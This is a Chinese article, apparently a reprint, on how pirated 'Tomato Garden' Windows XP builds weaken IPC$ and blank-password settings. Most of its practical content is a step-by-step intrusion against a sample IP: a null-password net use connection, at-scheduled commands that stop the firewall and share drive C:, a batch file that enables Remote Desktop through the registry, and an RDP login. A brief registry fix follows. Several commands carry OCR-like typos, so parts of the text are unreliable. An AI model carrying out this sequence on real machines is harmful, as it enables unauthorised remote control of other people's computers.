从番茄花园看经典IPC入侵
开篇:润墨网以专业的文秘视角,为您筛选了一篇从番茄花园看经典IPC入侵范文,如需获取更多写作素材,在线客服老师一对一协助。欢迎您的阅读与分享!
记得微软有个广告,说的是非授权软件就像毒蛇一样侵蚀着电脑里的重要文件。大家往往对此不以为然,但事实上,选用一些非授权,非原版的软件确实会带来这种问题,连广受欢迎的番茄花园也不能避免。
Windows系列的操作系统都提供共享服务,这些共享服务的主要通道就是IPC。IPC是Internet ProcessConnection的简称,也称共享命名管道,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。这种入侵方式在Windows 2000普及的年代非常流行。
默认情况下Windows系列的操作系统都支持空连接,空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。利用ipc$,连接者可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而XP系统限制了空连接导出用户列表的功能,提高了安全性。
默认共享是系统安装完毕后就自动开启的共享,也叫管理共享,常被管理员用于远程管理计算机。在Windows2000/XP及其以上版本中。默认开启的共享有“c$”、“d$”、“admin$”、“ipc$”等,我们可以在“运行”对话框中输入“\\计算机名\盘符$”对这些资源进行访问,以上这些共享就叫做默认共享。默认共享是只面向管理员组用户开启的共享,也就是说只有管理员组的用户才能访问这些共享,非管理员组用户(即使是超级用户)不能进行访问。如果我们在对话框中输入的不是管理员组用户而是其他用户组的账户和密码(如guest组、backup operators组、power users组等),系统是不会让我们访问该共享资源的。另外密码不能为空,否则也连不上XP的默认共享。
通常是无法利用IPC入侵原版XP的,最主要的原因是XP与2000在来访者的权限设置上是不同的,在XP中即使有管理员权限的用户和密码也不一定能建立联接或复制文件。
身份验证:XP默认是把从网络登录的所有用户都按来宾账户处理的,因此即使管理员从网络登录也只具有来宾的权限,在XP的(secpol.msc)本地安全设置/本地策略/安全选项中:
网络访问:本地帐户的共享和安全模式,有两个选项:
经典_本地用户以自己的身份验证
仅来宾_本地用户以来宾身份验证
当番茄花园系统安装完成后,所有的盘符默认共享自动关闭,远程桌面关闭,Remote Registry服务关闭,系统只开了ipc$通信命名管道,administrator密码为空,如果安全选项和空口令设置和原版相同,则系统也将是安全的,然而问题出来了,点开始/运行输入secpol.msc,展开本地安全设置/本地策略/安全选项中的“网络访问:本地帐户的共享和安全模式”,可以发现被改为“经典”。
空口令限制:在XP的注册表中有一项limitblank.passworduse,它是用来限制空口令连接的
[HKEY_LOcAL_MAcHINE\SYSTEM\ControlSet001\Control\LsaJ]
“limitblankpassworduse”=dword:00000001
很明显看出来,通过导人注册表来修改安全设置。
O:代表空密码有效。1:代表空密码无效。
系统默认是1,可以有效防止黑客人侵。
而在番茄花园系统中,点开始/运行输入Regedit,展开[HKEY_LoCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa]发现limitblankpassworduse被改为O。这就意味着,黑客利用了XP管理员的弱口令。
入侵番茄花园版XP,需要针对XP系统的特点,开启和关闭一些服务(假设目标IP是192.168.1.5)。
1)net use\\192.168.1.5\IPC$" "/user:"admintitrators"。
看到“命令成功完成”提示,连接成功1
2)net time\\192.168.1.5
查查时间,发现192.168.1.5的当前时间是2007/5/6下午5:12,出现“命令成功完成”提示。
3)at\\192.168.1.5 17:14 net stop“Window$Firewall/Internet connection Sharing(ICS)”
用at命令启动net stop关闭对方计算机中的Windows Firewall/Intemet Connection sharing(ICS)服务以利于关闭Windows防火墙。
4)执行at\\192.168.1.5检查任务是否安排。
5)再次执行net time\\192.168.1.5获得远程机器时间。
发现192.168.1.5的当前时间是2007/5/6下午5:29,出现“命令成功完成”提示。
6)执行at 17:30\\192.168.1.5 net share diskc=c:
开启192.168.1.5的C盘共享。
7)打开我的电脑,输入\\192.168.1.5\diskc,新建一个文本文件,输入以下内容
echo Windows Registry Editor Version 5.00>>3389.reg
echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control\Terminal server]>>3389.reg
echo"fDenyTSConnections"=dword:00000000>>3389.reg
echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcP]>>3389.reg
echo"PortNumber"=dword:00000d3d>>3389.reg
echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcpl>>3389.reg
echo"PortNumber"=dword:00000d3d>>3389.reg
regedit/s 3389.reg
del 3389.reg
将文件保存为3389.bat。
8)再次执行net time\\192.168.1.5获得远程机器时间,发现192.168.1.5的当前时间是2007/5/6下午6:29,出现“命令成功完成”提示。
9)执行at 18:30\\192.168.1.5c:\3389.bat。
10)点“开始/所有程序/附件/通讯”,运行“远程桌面连接”,输入192.168.1.5即可远程操作计算机了。
知道漏洞产生的原因后,修补起来也是相当的简单,关键是修改注册表中的limitblankpassworduse和forceguest的键值,将下面的内容保存为fix.reg,双击fix.reg,提示是否导入注册表,点确认后即可修补漏洞。
Windows Registrv Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] "forceguest"=dword:00000001 "limitblankpassworduse"=dword:00000001